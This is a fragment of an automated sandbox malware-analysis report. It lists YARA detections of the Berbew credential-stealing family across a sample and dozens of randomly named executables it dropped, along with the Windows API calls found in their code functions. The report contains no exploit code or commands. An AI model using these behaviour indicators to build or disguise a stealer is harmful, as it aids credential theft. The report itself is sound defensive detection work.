                      Source: C:\Windows\SysWOW64\Plgflqpn.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Baagdk32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ccapffke.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ceampi32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeAPI coverage: 8.3 %
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00402E06 GetVersion,LoadLibraryA,GetProcAddress,IsBadReadPtr,GlobalMemoryStatus,GetEnvironmentStringsW,CloseHandle,GetModuleHandleA,VirtualQuery,IsBadWritePtr,0_2_00402E06
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,0_2_00406C29

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Berbew
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2005214969.000000000042A000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2027822384.000000000042A000.00000004.00000001.01000000.00000026.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2017016443.000000000042A000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2011076811.000000000042A000.00000004.00000001.01000000.0000001D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2029071325.000000000042A000.00000004.00000001.01000000.00000027.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2005778309.000000000042A000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2016533194.000000000042A000.00000004.00000001.01000000.0000001F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2007866947.000000000042A000.00000004.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2031051927.000000000042A000.00000004.00000001.01000000.0000002A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2008521888.000000000042A000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2018453034.000000000042A000.00000004.00000001.01000000.00000021.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2019406612.000000000042A000.00000004.00000001.01000000.00000022.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2019682823.000000000042A000.00000004.00000001.01000000.00000023.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2022377114.000000000042A000.00000004.00000001.01000000.00000025.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2013905191.000000000042A000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.2030625851.000000000042A000.00000004.00000001.01000000.00000029.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: h879iieoae.exe PID: 6496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Nejhbi32.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ogjdllpi.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Opbieagi.exe PID: 6648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oglabl32.exe PID: 6692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Olijjb32.exe PID: 6744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oeanchcn.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oceoll32.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Onkcje32.exe PID: 6860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Odekfoij.exe PID: 6928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ojacofgb.exe PID: 6992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ppllkpoo.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plbmqa32.exe PID: 7092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plgflqpn.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Pqeoao32.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Qgcpihjl.exe PID: 2896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ajkolbad.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bmlhnnne.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgamkfnl.exe PID: 2924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bqjacldl.exe PID: 2256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnnampcf.exe PID: 5640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnpnbp32.exe PID: 6188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgibkegc.exe PID: 1740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Baagdk32.exe PID: 916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cfnpmb32.exe PID: 1188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ccapffke.exe PID: 7104, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ceampi32.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cnjaioih.exe PID: 4284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Camgpi32.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dmfdkj32.exe PID: 7196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dnhmjm32.exe PID: 7212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dfcboo32.exe PID: 7228, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Edgbhcim.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Emogai32.exe PID: 7260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Efgkjnfn.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Eoappk32.exe PID: 7292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fkogfkdj.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fhedeo32.exe PID: 7328, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Feidnc32.exe PID: 7344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Foaigifk.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,0_2_00405C09
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,0_2_00405133
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,1_2_00405C09
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,1_2_00405133
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,2_2_00405C09
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,2_2_00405133
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,3_2_00405C09
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,3_2_00405133
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,4_2_00405C09
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,4_2_00405133
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,5_2_00405C09
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,5_2_00405133
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,6_2_00405C09
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,6_2_00405133
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,7_2_00405C09
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,7_2_00405133
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,8_2_00405C09
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,8_2_00405133
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,9_2_00405C09
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,9_2_00405133
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle,10_2_00405C09
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle,10_2_00405133
